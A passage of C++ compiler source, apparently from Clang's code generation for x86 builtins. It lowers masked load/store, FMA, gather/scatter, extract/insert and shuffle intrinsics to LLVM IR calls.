INTRINSIC_X86_XSAVE_ID(xsetbv);
case X86::BI_xsetbv:
ID = Intrinsic::x86_xsetbv;
break;
}
#undef INTRINSIC_X86_XSAVE_ID
Value *Mhi = Builder.CreateTrunc(
Builder.CreateLShr(Ops[1], ConstantInt::get(Int64Ty, 32)), Int32Ty);
Value *Mlo = Builder.CreateTrunc(Ops[1], Int32Ty);
Ops[1] = Mhi;
Ops.push_back(Mlo);
return Builder.CreateCall(CGM.getIntrinsic(ID), Ops);
}
case X86::BI__builtin_ia32_xgetbv:
case X86::BI_xgetbv:
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_xgetbv), Ops);
case X86::BI__builtin_ia32_storedqudi128_mask:
case X86::BI__builtin_ia32_storedqusi128_mask:
case X86::BI__builtin_ia32_storedquhi128_mask:
case X86::BI__builtin_ia32_storedquqi128_mask:
case X86::BI__builtin_ia32_storeupd128_mask:
case X86::BI__builtin_ia32_storeups128_mask:
case X86::BI__builtin_ia32_storedqudi256_mask:
case X86::BI__builtin_ia32_storedqusi256_mask:
case X86::BI__builtin_ia32_storedquhi256_mask:
case X86::BI__builtin_ia32_storedquqi256_mask:
case X86::BI__builtin_ia32_storeupd256_mask:
case X86::BI__builtin_ia32_storeups256_mask:
case X86::BI__builtin_ia32_storedqudi512_mask:
case X86::BI__builtin_ia32_storedqusi512_mask:
case X86::BI__builtin_ia32_storedquhi512_mask:
case X86::BI__builtin_ia32_storedquqi512_mask:
case X86::BI__builtin_ia32_storeupd512_mask:
case X86::BI__builtin_ia32_storeups512_mask:
return EmitX86MaskedStore(*this, Ops, Align(1));
case X86::BI__builtin_ia32_storesh128_mask:
case X86::BI__builtin_ia32_storess128_mask:
case X86::BI__builtin_ia32_storesd128_mask:
return EmitX86MaskedStore(*this, Ops, Align(1));
case X86::BI__builtin_ia32_vpopcntb_128:
case X86::BI__builtin_ia32_vpopcntd_128:
case X86::BI__builtin_ia32_vpopcntq_128:
case X86::BI__builtin_ia32_vpopcntw_128:
case X86::BI__builtin_ia32_vpopcntb_256:
case X86::BI__builtin_ia32_vpopcntd_256:
case X86::BI__builtin_ia32_vpopcntq_256:
case X86::BI__builtin_ia32_vpopcntw_256:
case X86::BI__builtin_ia32_vpopcntb_512:
case X86::BI__builtin_ia32_vpopcntd_512:
case X86::BI__builtin_ia32_vpopcntq_512:
case X86::BI__builtin_ia32_vpopcntw_512: {
llvm::Type *ResultType = ConvertType(E->getType());
llvm::Function *F = CGM.getIntrinsic(Intrinsic::ctpop, ResultType);
return Builder.CreateCall(F, Ops);
}
case X86::BI__builtin_ia32_cvtmask2b128:
case X86::BI__builtin_ia32_cvtmask2b256:
case X86::BI__builtin_ia32_cvtmask2b512:
case X86::BI__builtin_ia32_cvtmask2w128:
case X86::BI__builtin_ia32_cvtmask2w256:
case X86::BI__builtin_ia32_cvtmask2w512:
case X86::BI__builtin_ia32_cvtmask2d128:
case X86::BI__builtin_ia32_cvtmask2d256:
case X86::BI__builtin_ia32_cvtmask2d512:
case X86::BI__builtin_ia32_cvtmask2q128:
case X86::BI__builtin_ia32_cvtmask2q256:
case X86::BI__builtin_ia32_cvtmask2q512:
return EmitX86SExtMask(*this, Ops[0], ConvertType(E->getType()));
case X86::BI__builtin_ia32_cvtb2mask128:
case X86::BI__builtin_ia32_cvtb2mask256:
case X86::BI__builtin_ia32_cvtb2mask512:
case X86::BI__builtin_ia32_cvtw2mask128:
case X86::BI__builtin_ia32_cvtw2mask256:
case X86::BI__builtin_ia32_cvtw2mask512:
case X86::BI__builtin_ia32_cvtd2mask128:
case X86::BI__builtin_ia32_cvtd2mask256:
case X86::BI__builtin_ia32_cvtd2mask512:
case X86::BI__builtin_ia32_cvtq2mask128:
case X86::BI__builtin_ia32_cvtq2mask256:
case X86::BI__builtin_ia32_cvtq2mask512:
return EmitX86ConvertToMask(*this, Ops[0]);
case X86::BI__builtin_ia32_cvtdq2ps512_mask:
case X86::BI__builtin_ia32_cvtqq2ps512_mask:
case X86::BI__builtin_ia32_cvtqq2pd512_mask:
case X86::BI__builtin_ia32_vcvtw2ph512_mask:
case X86::BI__builtin_ia32_vcvtdq2ph512_mask:
case X86::BI__builtin_ia32_vcvtqq2ph512_mask:
return EmitX86ConvertIntToFp(*this, E, Ops, /*IsSigned*/ true);
case X86::BI__builtin_ia32_cvtudq2ps512_mask:
case X86::BI__builtin_ia32_cvtuqq2ps512_mask:
case X86::BI__builtin_ia32_cvtuqq2pd512_mask:
case X86::BI__builtin_ia32_vcvtuw2ph512_mask:
case X86::BI__builtin_ia32_vcvtudq2ph512_mask:
case X86::BI__builtin_ia32_vcvtuqq2ph512_mask:
return EmitX86ConvertIntToFp(*this, E, Ops, /*IsSigned*/ false);
case X86::BI__builtin_ia32_vfmaddss3:
case X86::BI__builtin_ia32_vfmaddsd3:
case X86::BI__builtin_ia32_vfmaddsh3_mask:
case X86::BI__builtin_ia32_vfmaddss3_mask:
case X86::BI__builtin_ia32_vfmaddsd3_mask:
return EmitScalarFMAExpr(*this, E, Ops, Ops[0]);
case X86::BI__builtin_ia32_vfmaddss:
case X86::BI__builtin_ia32_vfmaddsd:
return EmitScalarFMAExpr(*this, E, Ops,
Constant::getNullValue(Ops[0]->getType()));
case X86::BI__builtin_ia32_vfmaddsh3_maskz:
case X86::BI__builtin_ia32_vfmaddss3_maskz:
case X86::BI__builtin_ia32_vfmaddsd3_maskz:
return EmitScalarFMAExpr(*this, E, Ops, Ops[0], /*ZeroMask*/ true);
case X86::BI__builtin_ia32_vfmaddsh3_mask3:
case X86::BI__builtin_ia32_vfmaddss3_mask3:
case X86::BI__builtin_ia32_vfmaddsd3_mask3:
return EmitScalarFMAExpr(*this, E, Ops, Ops[2], /*ZeroMask*/ false, 2);
case X86::BI__builtin_ia32_vfmsubsh3_mask3:
case X86::BI__builtin_ia32_vfmsubss3_mask3:
case X86::BI__builtin_ia32_vfmsubsd3_mask3:
return EmitScalarFMAExpr(*this, E, Ops, Ops[2], /*ZeroMask*/ false, 2,
/*NegAcc*/ true);
case X86::BI__builtin_ia32_vfmaddph:
case X86::BI__builtin_ia32_vfmaddps:
case X86::BI__builtin_ia32_vfmaddpd:
case X86::BI__builtin_ia32_vfmaddph256:
case X86::BI__builtin_ia32_vfmaddps256:
case X86::BI__builtin_ia32_vfmaddpd256:
case X86::BI__builtin_ia32_vfmaddph512_mask:
case X86::BI__builtin_ia32_vfmaddph512_maskz:
case X86::BI__builtin_ia32_vfmaddph512_mask3:
case X86::BI__builtin_ia32_vfmaddps512_mask:
case X86::BI__builtin_ia32_vfmaddps512_maskz:
case X86::BI__builtin_ia32_vfmaddps512_mask3:
case X86::BI__builtin_ia32_vfmsubps512_mask3:
case X86::BI__builtin_ia32_vfmaddpd512_mask:
case X86::BI__builtin_ia32_vfmaddpd512_maskz:
case X86::BI__builtin_ia32_vfmaddpd512_mask3:
case X86::BI__builtin_ia32_vfmsubpd512_mask3:
case X86::BI__builtin_ia32_vfmsubph512_mask3:
return EmitX86FMAExpr(*this, E, Ops, BuiltinID, /*IsAddSub*/ false);
case X86::BI__builtin_ia32_vfmaddsubph512_mask:
case X86::BI__builtin_ia32_vfmaddsubph512_maskz:
case X86::BI__builtin_ia32_vfmaddsubph512_mask3:
case X86::BI__builtin_ia32_vfmsubaddph512_mask3:
case X86::BI__builtin_ia32_vfmaddsubps512_mask:
case X86::BI__builtin_ia32_vfmaddsubps512_maskz:
case X86::BI__builtin_ia32_vfmaddsubps512_mask3:
case X86::BI__builtin_ia32_vfmsubaddps512_mask3:
case X86::BI__builtin_ia32_vfmaddsubpd512_mask:
case X86::BI__builtin_ia32_vfmaddsubpd512_maskz:
case X86::BI__builtin_ia32_vfmaddsubpd512_mask3:
case X86::BI__builtin_ia32_vfmsubaddpd512_mask3:
return EmitX86FMAExpr(*this, E, Ops, BuiltinID, /*IsAddSub*/ true);
case X86::BI__builtin_ia32_movdqa32store128_mask:
case X86::BI__builtin_ia32_movdqa64store128_mask:
case X86::BI__builtin_ia32_storeaps128_mask:
case X86::BI__builtin_ia32_storeapd128_mask:
case X86::BI__builtin_ia32_movdqa32store256_mask:
case X86::BI__builtin_ia32_movdqa64store256_mask:
case X86::BI__builtin_ia32_storeaps256_mask:
case X86::BI__builtin_ia32_storeapd256_mask:
case X86::BI__builtin_ia32_movdqa32store512_mask:
case X86::BI__builtin_ia32_movdqa64store512_mask:
case X86::BI__builtin_ia32_storeaps512_mask:
case X86::BI__builtin_ia32_storeapd512_mask:
return EmitX86MaskedStore(
*this, Ops,
getContext().getTypeAlignInChars(E->getArg(1)->getType()).getAsAlign());
case X86::BI__builtin_ia32_loadups128_mask:
case X86::BI__builtin_ia32_loadups256_mask:
case X86::BI__builtin_ia32_loadups512_mask:
case X86::BI__builtin_ia32_loadupd128_mask:
case X86::BI__builtin_ia32_loadupd256_mask:
case X86::BI__builtin_ia32_loadupd512_mask:
case X86::BI__builtin_ia32_loaddquqi128_mask:
case X86::BI__builtin_ia32_loaddquqi256_mask:
case X86::BI__builtin_ia32_loaddquqi512_mask:
case X86::BI__builtin_ia32_loaddquhi128_mask:
case X86::BI__builtin_ia32_loaddquhi256_mask:
case X86::BI__builtin_ia32_loaddquhi512_mask:
case X86::BI__builtin_ia32_loaddqusi128_mask:
case X86::BI__builtin_ia32_loaddqusi256_mask:
case X86::BI__builtin_ia32_loaddqusi512_mask:
case X86::BI__builtin_ia32_loaddqudi128_mask:
case X86::BI__builtin_ia32_loaddqudi256_mask:
case X86::BI__builtin_ia32_loaddqudi512_mask:
return EmitX86MaskedLoad(*this, Ops, Align(1));
case X86::BI__builtin_ia32_loadsh128_mask:
case X86::BI__builtin_ia32_loadss128_mask:
case X86::BI__builtin_ia32_loadsd128_mask:
return EmitX86MaskedLoad(*this, Ops, Align(1));
case X86::BI__builtin_ia32_loadaps128_mask:
case X86::BI__builtin_ia32_loadaps256_mask:
case X86::BI__builtin_ia32_loadaps512_mask:
case X86::BI__builtin_ia32_loadapd128_mask:
case X86::BI__builtin_ia32_loadapd256_mask:
case X86::BI__builtin_ia32_loadapd512_mask:
case X86::BI__builtin_ia32_movdqa32load128_mask:
case X86::BI__builtin_ia32_movdqa32load256_mask:
case X86::BI__builtin_ia32_movdqa32load512_mask:
case X86::BI__builtin_ia32_movdqa64load128_mask:
case X86::BI__builtin_ia32_movdqa64load256_mask:
case X86::BI__builtin_ia32_movdqa64load512_mask:
return EmitX86MaskedLoad(
*this, Ops,
getContext().getTypeAlignInChars(E->getArg(1)->getType()).getAsAlign());
case X86::BI__builtin_ia32_expandloaddf128_mask:
case X86::BI__builtin_ia32_expandloaddf256_mask:
case X86::BI__builtin_ia32_expandloaddf512_mask:
case X86::BI__builtin_ia32_expandloadsf128_mask:
case X86::BI__builtin_ia32_expandloadsf256_mask:
case X86::BI__builtin_ia32_expandloadsf512_mask:
case X86::BI__builtin_ia32_expandloaddi128_mask:
case X86::BI__builtin_ia32_expandloaddi256_mask:
case X86::BI__builtin_ia32_expandloaddi512_mask:
case X86::BI__builtin_ia32_expandloadsi128_mask:
case X86::BI__builtin_ia32_expandloadsi256_mask:
case X86::BI__builtin_ia32_expandloadsi512_mask:
case X86::BI__builtin_ia32_expandloadhi128_mask:
case X86::BI__builtin_ia32_expandloadhi256_mask:
case X86::BI__builtin_ia32_expandloadhi512_mask:
case X86::BI__builtin_ia32_expandloadqi128_mask:
case X86::BI__builtin_ia32_expandloadqi256_mask:
case X86::BI__builtin_ia32_expandloadqi512_mask:
return EmitX86ExpandLoad(*this, Ops);
case X86::BI__builtin_ia32_compressstoredf128_mask:
case X86::BI__builtin_ia32_compressstoredf256_mask:
case X86::BI__builtin_ia32_compressstoredf512_mask:
case X86::BI__builtin_ia32_compressstoresf128_mask:
case X86::BI__builtin_ia32_compressstoresf256_mask:
case X86::BI__builtin_ia32_compressstoresf512_mask:
case X86::BI__builtin_ia32_compressstoredi128_mask:
case X86::BI__builtin_ia32_compressstoredi256_mask:
case X86::BI__builtin_ia32_compressstoredi512_mask:
case X86::BI__builtin_ia32_compressstoresi128_mask:
case X86::BI__builtin_ia32_compressstoresi256_mask:
case X86::BI__builtin_ia32_compressstoresi512_mask:
case X86::BI__builtin_ia32_compressstorehi128_mask:
case X86::BI__builtin_ia32_compressstorehi256_mask:
case X86::BI__builtin_ia32_compressstorehi512_mask:
case X86::BI__builtin_ia32_compressstoreqi128_mask:
case X86::BI__builtin_ia32_compressstoreqi256_mask:
case X86::BI__builtin_ia32_compressstoreqi512_mask:
return EmitX86CompressStore(*this, Ops);
case X86::BI__builtin_ia32_expanddf128_mask:
case X86::BI__builtin_ia32_expanddf256_mask:
case X86::BI__builtin_ia32_expanddf512_mask:
case X86::BI__builtin_ia32_expandsf128_mask:
case X86::BI__builtin_ia32_expandsf256_mask:
case X86::BI__builtin_ia32_expandsf512_mask:
case X86::BI__builtin_ia32_expanddi128_mask:
case X86::BI__builtin_ia32_expanddi256_mask:
case X86::BI__builtin_ia32_expanddi512_mask:
case X86::BI__builtin_ia32_expandsi128_mask:
case X86::BI__builtin_ia32_expandsi256_mask:
case X86::BI__builtin_ia32_expandsi512_mask:
case X86::BI__builtin_ia32_expandhi128_mask:
case X86::BI__builtin_ia32_expandhi256_mask:
case X86::BI__builtin_ia32_expandhi512_mask:
case X86::BI__builtin_ia32_expandqi128_mask:
case X86::BI__builtin_ia32_expandqi256_mask:
case X86::BI__builtin_ia32_expandqi512_mask:
return EmitX86CompressExpand(*this, Ops, /*IsCompress*/false);
case X86::BI__builtin_ia32_compressdf128_mask:
case X86::BI__builtin_ia32_compressdf256_mask:
case X86::BI__builtin_ia32_compressdf512_mask:
case X86::BI__builtin_ia32_compresssf128_mask:
case X86::BI__builtin_ia32_compresssf256_mask:
case X86::BI__builtin_ia32_compresssf512_mask:
case X86::BI__builtin_ia32_compressdi128_mask:
case X86::BI__builtin_ia32_compressdi256_mask:
case X86::BI__builtin_ia32_compressdi512_mask:
case X86::BI__builtin_ia32_compresssi128_mask:
case X86::BI__builtin_ia32_compresssi256_mask:
case X86::BI__builtin_ia32_compresssi512_mask:
case X86::BI__builtin_ia32_compresshi128_mask:
case X86::BI__builtin_ia32_compresshi256_mask:
case X86::BI__builtin_ia32_compresshi512_mask:
case X86::BI__builtin_ia32_compressqi128_mask:
case X86::BI__builtin_ia32_compressqi256_mask:
case X86::BI__builtin_ia32_compressqi512_mask:
return EmitX86CompressExpand(*this, Ops, /*IsCompress*/true);
case X86::BI__builtin_ia32_gather3div2df:
case X86::BI__builtin_ia32_gather3div2di:
case X86::BI__builtin_ia32_gather3div4df:
case X86::BI__builtin_ia32_gather3div4di:
case X86::BI__builtin_ia32_gather3div4sf:
case X86::BI__builtin_ia32_gather3div4si:
case X86::BI__builtin_ia32_gather3div8sf:
case X86::BI__builtin_ia32_gather3div8si:
case X86::BI__builtin_ia32_gather3siv2df:
case X86::BI__builtin_ia32_gather3siv2di:
case X86::BI__builtin_ia32_gather3siv4df:
case X86::BI__builtin_ia32_gather3siv4di:
case X86::BI__builtin_ia32_gather3siv4sf:
case X86::BI__builtin_ia32_gather3siv4si:
case X86::BI__builtin_ia32_gather3siv8sf:
case X86::BI__builtin_ia32_gather3siv8si:
case X86::BI__builtin_ia32_gathersiv8df:
case X86::BI__builtin_ia32_gathersiv16sf:
case X86::BI__builtin_ia32_gatherdiv8df:
case X86::BI__builtin_ia32_gatherdiv16sf:
case X86::BI__builtin_ia32_gathersiv8di:
case X86::BI__builtin_ia32_gathersiv16si:
case X86::BI__builtin_ia32_gatherdiv8di:
case X86::BI__builtin_ia32_gatherdiv16si: {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unexpected builtin");
case X86::BI__builtin_ia32_gather3div2df:
IID = Intrinsic::x86_avx512_mask_gather3div2_df;
break;
case X86::BI__builtin_ia32_gather3div2di:
IID = Intrinsic::x86_avx512_mask_gather3div2_di;
break;
case X86::BI__builtin_ia32_gather3div4df:
IID = Intrinsic::x86_avx512_mask_gather3div4_df;
break;
case X86::BI__builtin_ia32_gather3div4di:
IID = Intrinsic::x86_avx512_mask_gather3div4_di;
break;
case X86::BI__builtin_ia32_gather3div4sf:
IID = Intrinsic::x86_avx512_mask_gather3div4_sf;
break;
case X86::BI__builtin_ia32_gather3div4si:
IID = Intrinsic::x86_avx512_mask_gather3div4_si;
break;
case X86::BI__builtin_ia32_gather3div8sf:
IID = Intrinsic::x86_avx512_mask_gather3div8_sf;
break;
case X86::BI__builtin_ia32_gather3div8si:
IID = Intrinsic::x86_avx512_mask_gather3div8_si;
break;
case X86::BI__builtin_ia32_gather3siv2df:
IID = Intrinsic::x86_avx512_mask_gather3siv2_df;
break;
case X86::BI__builtin_ia32_gather3siv2di:
IID = Intrinsic::x86_avx512_mask_gather3siv2_di;
break;
case X86::BI__builtin_ia32_gather3siv4df:
IID = Intrinsic::x86_avx512_mask_gather3siv4_df;
break;
case X86::BI__builtin_ia32_gather3siv4di:
IID = Intrinsic::x86_avx512_mask_gather3siv4_di;
break;
case X86::BI__builtin_ia32_gather3siv4sf:
IID = Intrinsic::x86_avx512_mask_gather3siv4_sf;
break;
case X86::BI__builtin_ia32_gather3siv4si:
IID = Intrinsic::x86_avx512_mask_gather3siv4_si;
break;
case X86::BI__builtin_ia32_gather3siv8sf:
IID = Intrinsic::x86_avx512_mask_gather3siv8_sf;
break;
case X86::BI__builtin_ia32_gather3siv8si:
IID = Intrinsic::x86_avx512_mask_gather3siv8_si;
break;
case X86::BI__builtin_ia32_gathersiv8df:
IID = Intrinsic::x86_avx512_mask_gather_dpd_512;
break;
case X86::BI__builtin_ia32_gathersiv16sf:
IID = Intrinsic::x86_avx512_mask_gather_dps_512;
break;
case X86::BI__builtin_ia32_gatherdiv8df:
IID = Intrinsic::x86_avx512_mask_gather_qpd_512;
break;
case X86::BI__builtin_ia32_gatherdiv16sf:
IID = Intrinsic::x86_avx512_mask_gather_qps_512;
break;
case X86::BI__builtin_ia32_gathersiv8di:
IID = Intrinsic::x86_avx512_mask_gather_dpq_512;
break;
case X86::BI__builtin_ia32_gathersiv16si:
IID = Intrinsic::x86_avx512_mask_gather_dpi_512;
break;
case X86::BI__builtin_ia32_gatherdiv8di:
IID = Intrinsic::x86_avx512_mask_gather_qpq_512;
break;
case X86::BI__builtin_ia32_gatherdiv16si:
IID = Intrinsic::x86_avx512_mask_gather_qpi_512;
break;
}
unsigned MinElts = std::min(
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements(),
cast<llvm::FixedVectorType>(Ops[2]->getType())->getNumElements());
Ops[3] = getMaskVecValue(*this, Ops[3], MinElts);
Function *Intr = CGM.getIntrinsic(IID);
return Builder.CreateCall(Intr, Ops);
}
case X86::BI__builtin_ia32_scattersiv8df:
case X86::BI__builtin_ia32_scattersiv16sf:
case X86::BI__builtin_ia32_scatterdiv8df:
case X86::BI__builtin_ia32_scatterdiv16sf:
case X86::BI__builtin_ia32_scattersiv8di:
case X86::BI__builtin_ia32_scattersiv16si:
case X86::BI__builtin_ia32_scatterdiv8di:
case X86::BI__builtin_ia32_scatterdiv16si:
case X86::BI__builtin_ia32_scatterdiv2df:
case X86::BI__builtin_ia32_scatterdiv2di:
case X86::BI__builtin_ia32_scatterdiv4df:
case X86::BI__builtin_ia32_scatterdiv4di:
case X86::BI__builtin_ia32_scatterdiv4sf:
case X86::BI__builtin_ia32_scatterdiv4si:
case X86::BI__builtin_ia32_scatterdiv8sf:
case X86::BI__builtin_ia32_scatterdiv8si:
case X86::BI__builtin_ia32_scattersiv2df:
case X86::BI__builtin_ia32_scattersiv2di:
case X86::BI__builtin_ia32_scattersiv4df:
case X86::BI__builtin_ia32_scattersiv4di:
case X86::BI__builtin_ia32_scattersiv4sf:
case X86::BI__builtin_ia32_scattersiv4si:
case X86::BI__builtin_ia32_scattersiv8sf:
case X86::BI__builtin_ia32_scattersiv8si: {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unexpected builtin");
case X86::BI__builtin_ia32_scattersiv8df:
IID = Intrinsic::x86_avx512_mask_scatter_dpd_512;
break;
case X86::BI__builtin_ia32_scattersiv16sf:
IID = Intrinsic::x86_avx512_mask_scatter_dps_512;
break;
case X86::BI__builtin_ia32_scatterdiv8df:
IID = Intrinsic::x86_avx512_mask_scatter_qpd_512;
break;
case X86::BI__builtin_ia32_scatterdiv16sf:
IID = Intrinsic::x86_avx512_mask_scatter_qps_512;
break;
case X86::BI__builtin_ia32_scattersiv8di:
IID = Intrinsic::x86_avx512_mask_scatter_dpq_512;
break;
case X86::BI__builtin_ia32_scattersiv16si:
IID = Intrinsic::x86_avx512_mask_scatter_dpi_512;
break;
case X86::BI__builtin_ia32_scatterdiv8di:
IID = Intrinsic::x86_avx512_mask_scatter_qpq_512;
break;
case X86::BI__builtin_ia32_scatterdiv16si:
IID = Intrinsic::x86_avx512_mask_scatter_qpi_512;
break;
case X86::BI__builtin_ia32_scatterdiv2df:
IID = Intrinsic::x86_avx512_mask_scatterdiv2_df;
break;
case X86::BI__builtin_ia32_scatterdiv2di:
IID = Intrinsic::x86_avx512_mask_scatterdiv2_di;
break;
case X86::BI__builtin_ia32_scatterdiv4df:
IID = Intrinsic::x86_avx512_mask_scatterdiv4_df;
break;
case X86::BI__builtin_ia32_scatterdiv4di:
IID = Intrinsic::x86_avx512_mask_scatterdiv4_di;
break;
case X86::BI__builtin_ia32_scatterdiv4sf:
IID = Intrinsic::x86_avx512_mask_scatterdiv4_sf;
break;
case X86::BI__builtin_ia32_scatterdiv4si:
IID = Intrinsic::x86_avx512_mask_scatterdiv4_si;
break;
case X86::BI__builtin_ia32_scatterdiv8sf:
IID = Intrinsic::x86_avx512_mask_scatterdiv8_sf;
break;
case X86::BI__builtin_ia32_scatterdiv8si:
IID = Intrinsic::x86_avx512_mask_scatterdiv8_si;
break;
case X86::BI__builtin_ia32_scattersiv2df:
IID = Intrinsic::x86_avx512_mask_scattersiv2_df;
break;
case X86::BI__builtin_ia32_scattersiv2di:
IID = Intrinsic::x86_avx512_mask_scattersiv2_di;
break;
case X86::BI__builtin_ia32_scattersiv4df:
IID = Intrinsic::x86_avx512_mask_scattersiv4_df;
break;
case X86::BI__builtin_ia32_scattersiv4di:
IID = Intrinsic::x86_avx512_mask_scattersiv4_di;
break;
case X86::BI__builtin_ia32_scattersiv4sf:
IID = Intrinsic::x86_avx512_mask_scattersiv4_sf;
break;
case X86::BI__builtin_ia32_scattersiv4si:
IID = Intrinsic::x86_avx512_mask_scattersiv4_si;
break;
case X86::BI__builtin_ia32_scattersiv8sf:
IID = Intrinsic::x86_avx512_mask_scattersiv8_sf;
break;
case X86::BI__builtin_ia32_scattersiv8si:
IID = Intrinsic::x86_avx512_mask_scattersiv8_si;
break;
}
unsigned MinElts = std::min(
cast<llvm::FixedVectorType>(Ops[2]->getType())->getNumElements(),
cast<llvm::FixedVectorType>(Ops[3]->getType())->getNumElements());
Ops[1] = getMaskVecValue(*this, Ops[1], MinElts);
Function *Intr = CGM.getIntrinsic(IID);
return Builder.CreateCall(Intr, Ops);
}
case X86::BI__builtin_ia32_vextractf128_pd256:
case X86::BI__builtin_ia32_vextractf128_ps256:
case X86::BI__builtin_ia32_vextractf128_si256:
case X86::BI__builtin_ia32_extract128i256:
case X86::BI__builtin_ia32_extractf64x4_mask:
case X86::BI__builtin_ia32_extractf32x4_mask:
case X86::BI__builtin_ia32_extracti64x4_mask:
case X86::BI__builtin_ia32_extracti32x4_mask:
case X86::BI__builtin_ia32_extractf32x8_mask:
case X86::BI__builtin_ia32_extracti32x8_mask:
case X86::BI__builtin_ia32_extractf32x4_256_mask:
case X86::BI__builtin_ia32_extracti32x4_256_mask:
case X86::BI__builtin_ia32_extractf64x2_256_mask:
case X86::BI__builtin_ia32_extracti64x2_256_mask:
case X86::BI__builtin_ia32_extractf64x2_512_mask:
case X86::BI__builtin_ia32_extracti64x2_512_mask: {
auto *DstTy = cast<llvm::FixedVectorType>(ConvertType(E->getType()));
unsigned NumElts = DstTy->getNumElements();
unsigned SrcNumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
unsigned SubVectors = SrcNumElts / NumElts;
unsigned Index = cast<ConstantInt>(Ops[1])->getZExtValue();
assert(llvm::isPowerOf2_32(SubVectors) && "Expected power of 2 subvectors");
Index &= SubVectors - 1; // Remove any extra bits.
Index *= NumElts;
int Indices[16];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = i + Index;
Value *Res = Builder.CreateShuffleVector(Ops[0],
makeArrayRef(Indices, NumElts),
"extract");
if (Ops.size() == 4)
Res = EmitX86Select(*this, Ops[3], Res, Ops[2]);
return Res;
}
case X86::BI__builtin_ia32_vinsertf128_pd256:
case X86::BI__builtin_ia32_vinsertf128_ps256:
case X86::BI__builtin_ia32_vinsertf128_si256:
case X86::BI__builtin_ia32_insert128i256:
case X86::BI__builtin_ia32_insertf64x4:
case X86::BI__builtin_ia32_insertf32x4:
case X86::BI__builtin_ia32_inserti64x4:
case X86::BI__builtin_ia32_inserti32x4:
case X86::BI__builtin_ia32_insertf32x8:
case X86::BI__builtin_ia32_inserti32x8:
case X86::BI__builtin_ia32_insertf32x4_256:
case X86::BI__builtin_ia32_inserti32x4_256:
case X86::BI__builtin_ia32_insertf64x2_256:
case X86::BI__builtin_ia32_inserti64x2_256:
case X86::BI__builtin_ia32_insertf64x2_512:
case X86::BI__builtin_ia32_inserti64x2_512: {
unsigned DstNumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
unsigned SrcNumElts =
cast<llvm::FixedVectorType>(Ops[1]->getType())->getNumElements();
unsigned SubVectors = DstNumElts / SrcNumElts;
unsigned Index = cast<ConstantInt>(Ops[2])->getZExtValue();
assert(llvm::isPowerOf2_32(SubVectors) && "Expected power of 2 subvectors");
Index &= SubVectors - 1; // Remove any extra bits.
Index *= SrcNumElts;
int Indices[16];
for (unsigned i = 0; i != DstNumElts; ++i)
Indices[i] = (i >= SrcNumElts) ? SrcNumElts + (i % SrcNumElts) : i;
Value *Op1 = Builder.CreateShuffleVector(Ops[1],
makeArrayRef(Indices, DstNumElts),
"widen");
for (unsigned i = 0; i != DstNumElts; ++i) {
if (i >= Index && i < (Index + SrcNumElts))
Indices[i] = (i - Index) + DstNumElts;
else
Indices[i] = i;
}
return Builder.CreateShuffleVector(Ops[0], Op1,
makeArrayRef(Indices, DstNumElts),
"insert");
}
case X86::BI__builtin_ia32_pmovqd512_mask:
case X86::BI__builtin_ia32_pmovwb512_mask: {
Value *Res = Builder.CreateTrunc(Ops[0], Ops[1]->getType());
return EmitX86Select(*this, Ops[2], Res, Ops[1]);
}
case X86::BI__builtin_ia32_pmovdb512_mask:
case X86::BI__builtin_ia32_pmovdw512_mask:
case X86::BI__builtin_ia32_pmovqw512_mask: {
if (const auto *C = dyn_cast<Constant>(Ops[2]))
if (C->isAllOnesValue())
return Builder.CreateTrunc(Ops[0], Ops[1]->getType());
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_pmovdb512_mask:
IID = Intrinsic::x86_avx512_mask_pmov_db_512;
break;
case X86::BI__builtin_ia32_pmovdw512_mask:
IID = Intrinsic::x86_avx512_mask_pmov_dw_512;
break;
case X86::BI__builtin_ia32_pmovqw512_mask:
IID = Intrinsic::x86_avx512_mask_pmov_qw_512;
break;
}
Function *Intr = CGM.getIntrinsic(IID);
return Builder.CreateCall(Intr, Ops);
}
case X86::BI__builtin_ia32_pblendw128:
case X86::BI__builtin_ia32_blendpd:
case X86::BI__builtin_ia32_blendps:
case X86::BI__builtin_ia32_blendpd256:
case X86::BI__builtin_ia32_blendps256:
case X86::BI__builtin_ia32_pblendw256:
case X86::BI__builtin_ia32_pblendd128:
case X86::BI__builtin_ia32_pblendd256: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
unsigned Imm = cast<llvm::ConstantInt>(Ops[2])->getZExtValue();
int Indices[16];
// If there are more than 8 elements, the immediate is used twice so make
// sure we handle that.
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = ((Imm >> (i % 8)) & 0x1) ? NumElts + i : i;
return Builder.CreateShuffleVector(Ops[0], Ops[1],
makeArrayRef(Indices, NumElts),
"blend");
}
case X86::BI__builtin_ia32_pshuflw:
case X86::BI__builtin_ia32_pshuflw256:
case X86::BI__builtin_ia32_pshuflw512: {
uint32_t Imm = cast<llvm::ConstantInt>(Ops[1])->getZExtValue();
auto *Ty = cast<llvm::FixedVectorType>(Ops[0]->getType());
unsigned NumElts = Ty->getNumElements();
// Splat the 8-bits of immediate 4 times to help the loop wrap around.
Imm = (Imm & 0xff) * 0x01010101;
int Indices[32];
for (unsigned l = 0; l != NumElts; l += 8) {
for (unsigned i = 0; i != 4; ++i) {
Indices[l + i] = l + (Imm & 3);
Imm >>= 2;
}
for (unsigned i = 4; i != 8; ++i)
Indices[l + i] = l + i;
}
return Builder.CreateShuffleVector(Ops[0], makeArrayRef(Indices, NumElts),
"pshuflw");
}
case X86::BI__builtin_ia32_pshufhw:
case X86::BI__builtin_ia32_pshufhw256:
case X86::BI__builtin_ia32_pshufhw512: {
uint32_t Imm = cast<llvm::ConstantInt>(Ops[1])->getZExtValue();
auto *Ty = cast<llvm::FixedVectorType>(Ops[0]->getType());
unsigned NumElts = Ty->getNumElements();
// Splat the 8-bits of immediate 4 times to help the loop wrap around.
Imm = (Imm & 0xff) * 0x01010101;
int Indices[32];
for (unsigned l = 0; l != NumElts; l += 8) {
for (unsigned i = 0; i != 4; ++i)
Indices[l + i] = l + i;
for (unsigned i = 4; i != 8; ++i) {
